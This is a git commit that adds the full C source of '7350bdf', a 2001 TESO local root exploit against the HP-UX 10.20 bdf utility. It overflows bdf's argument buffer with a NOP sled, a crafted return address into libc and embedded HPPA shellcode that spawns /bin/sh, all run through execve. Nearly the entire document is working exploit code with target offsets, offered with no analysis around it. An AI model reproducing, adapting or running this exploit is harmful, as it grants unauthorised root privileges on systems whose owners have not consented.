summaryrefslogtreecommitdiff
path: root/exploits/7350bdf
diff options
context:
space:
mode:
authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /exploits/7350bdf
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'exploits/7350bdf')
-rw-r--r--exploits/7350bdf/7350bdf.c201
1 files changed, 201 insertions, 0 deletions
diff --git a/exploits/7350bdf/7350bdf.c b/exploits/7350bdf/7350bdf.c
new file mode 100644
index 0000000..144214b
--- /dev/null
+++ b/exploits/7350bdf/7350bdf.c
@@ -0,0 +1,201 @@
1/* 7350bdf - hppa/hpux bdf local root exploit
2 *
3 * TESO CONFIDENTIAL - SOURCE MATERIALS
4 *
5 * This is unpublished proprietary source code of TESO Security.
6 *
7 * The contents of these coded instructions, statements and computer
8 * programs may not be disclosed to third parties, copied or duplicated in
9 * any form, in whole or in part, without the prior written permission of
10 * TESO Security. This includes especially the Bugtraq mailing list, the
11 * www.hack.co.za, PacketStorm Security and SecuriTeam websites and any public
12 * exploit archive.
13 *
14 * (C) COPYRIGHT TESO Security, 2001
15 * All Rights Reserved
16 *
17 *****************************************************************************
18 * found by scut 2001/08/21, yah yah i know its old
19 * kudos to caddis for enlightning me about quadrants
20 *
21 */
22
23#define VERSION "0.0.1"
24
25#include <stdio.h>
26#include <stdlib.h>
27#include <unistd.h>
28
29
30void usage (char *progname);
31
32
33typedef struct {
34 char * desc;
35 int bsize; /* overall buffer size */
36 int align;
37
38 /* the return address has to
39 *
40 * a) lie within the shared library quadrant (within libc)
41 * b) point to some code snippet that looks like this:
42 *
43 * 0xc0108ea8: ldw -18(sr0,sp),rp
44 * 0xc0108eac: ldsid (sr0,rp),r1
45 * 0xc0108eb0: mtsp r1,sr0
46 * 0xc0108eb4: be,n 0(sr0,rp)
47 *
48 * this sets the space id accordingly, so we can return into
49 * the stack
50 */
51 int ret_pos;
52 unsigned int ret_addr;
53
54 /* this is the address our code lies at, and the position where to
55 * put it
56 */
57 int code_pos;
58 unsigned int code_addr;
59
60 /* at least HP-UX 10.20 needs a sane value at a place, which i
61 * happened to call r15_val, since it is passed through %r15
62 */
63 int r15_pos;
64 unsigned int r15_val;
65} t_elem;
66
67t_elem targets[] = {
68 /* tested on: HP-UX calina B.10.20 A 9000/735 -sc */
69 { "HP-UX 10.20", 1200, 3, 1196, 0xc0108ea8,
70 1192, 0x7b03a220, 1040, 0x7b03a4f8 },
71
72 { NULL, 0, 0, 0, 0, 0 },
73};
74
75
76/* LSD shellcode, thanks buddies */
77unsigned char nop[] =
78 "\x0b\x39\x02\x99"; /* xor %r25,%r25,%r25 */
79
80unsigned char shellcode[] =
81 "\x0b\x5a\x02\x9a" /* xor %r26,%r26,%r26 */
82 "\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */
83 "\x0b\x18\x02\x98" /* xor %r24,%r24,%r24 */
84 "\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */
85 "\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */
86 "\xb4\x16\x70\xfc" /* addi,> 0x7e,%r0,%r22 */
87
88 "\xeb\x5f\x1f\xfd" /* bl <shellcode+4>,%r26 */
89 "\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */
90 "\xb7\x5a\x40\x22" /* addi,< 0x11,%r26,%r26 */
91 "\x0f\x40\x12\x0e" /* stbs %r0,7(%r26) */
92 "\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */
93 "\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */
94 "\xb4\x16\x70\x16" /* addi,> 0xb,%r0,%r22 */
95 "/bin/shA";
96
97
98void
99usage (char *progname)
100{
101 fprintf (stderr, "usage: %s [-t <num>]\n\n", progname);
102 fprintf (stderr, "-t num\tchoose target (0 for list)\n\n");
103
104 exit (EXIT_FAILURE);
105}
106
107
108int
109main (int argc, char *argv[])
110{
111 char c;
112 int b_walker;
113 unsigned int * iptr;
114 unsigned char buf[2048];
115
116 char * n_argv[3];
117 char * n_env[1];
118
119 int tgt_num = -1;
120 t_elem * tgt;
121
122
123 printf ("7350bdf - hppa/hpux bdf local root exploit\n"
124 "-scut\n\n");
125
126 while ((c = getopt (argc, argv, "t:")) != EOF) {
127 switch (c) {
128 case 't':
129 tgt_num = atoi (optarg);
130 break;
131 default:
132 usage (argv[0]);
133 break;
134 }
135 }
136
137 if (tgt_num < 0)
138 usage (argv[0]);
139
140 if (tgt_num == 0) {
141 printf ("num . description\n");
142 printf ("----+--------------------------------\n");
143
144 for ( ; targets[tgt_num].desc != NULL ; ++tgt_num)
145 printf ("%3d | %s\n", tgt_num + 1,
146 targets[tgt_num].desc);
147
148 printf (" '\n");
149
150 exit (EXIT_SUCCESS);
151 }
152
153 if (tgt_num >= (sizeof (targets) / sizeof (t_elem)))
154 usage (argv[0]);
155
156 tgt = &targets[tgt_num - 1];
157 printf ("using: %s\n", tgt->desc);
158
159 memset (buf, '\0', sizeof (buf));
160
161 /* set nops */
162 if (tgt->align != 0)
163 memset (buf, 'A', tgt->align);
164
165 for (b_walker = tgt->align ; b_walker < (tgt->bsize - tgt->align) ;
166 b_walker += 4)
167 {
168 buf[b_walker] = nop[0];
169 buf[b_walker + 1] = nop[1];
170 buf[b_walker + 2] = nop[2];
171 buf[b_walker + 3] = nop[3];
172 }
173
174 if (tgt->r15_pos != 0) {
175 iptr = (unsigned int *) &buf[tgt->r15_pos];
176
177 *iptr = tgt->r15_val; /* sane %r15 */
178 }
179
180 iptr = (unsigned int *) &buf[tgt->code_pos];
181 *iptr = tgt->code_addr; /* real retaddr */
182
183 iptr = (unsigned int *) &buf[tgt->ret_pos];
184 *iptr = tgt->ret_addr; /* yay! */
185
186 /* we assume the buffer is 1024 bytes long */
187 memcpy (&buf[1023] - strlen (shellcode), shellcode,
188 strlen (shellcode));
189
190 buf[tgt->bsize] = '\0';
191
192 n_argv[0] = "/usr/bin/bdf";
193 n_argv[1] = buf;
194 n_env[0] = NULL;
195
196 execve (n_argv[0], n_argv, n_env);
197
198 exit (EXIT_FAILURE);
199}
200
201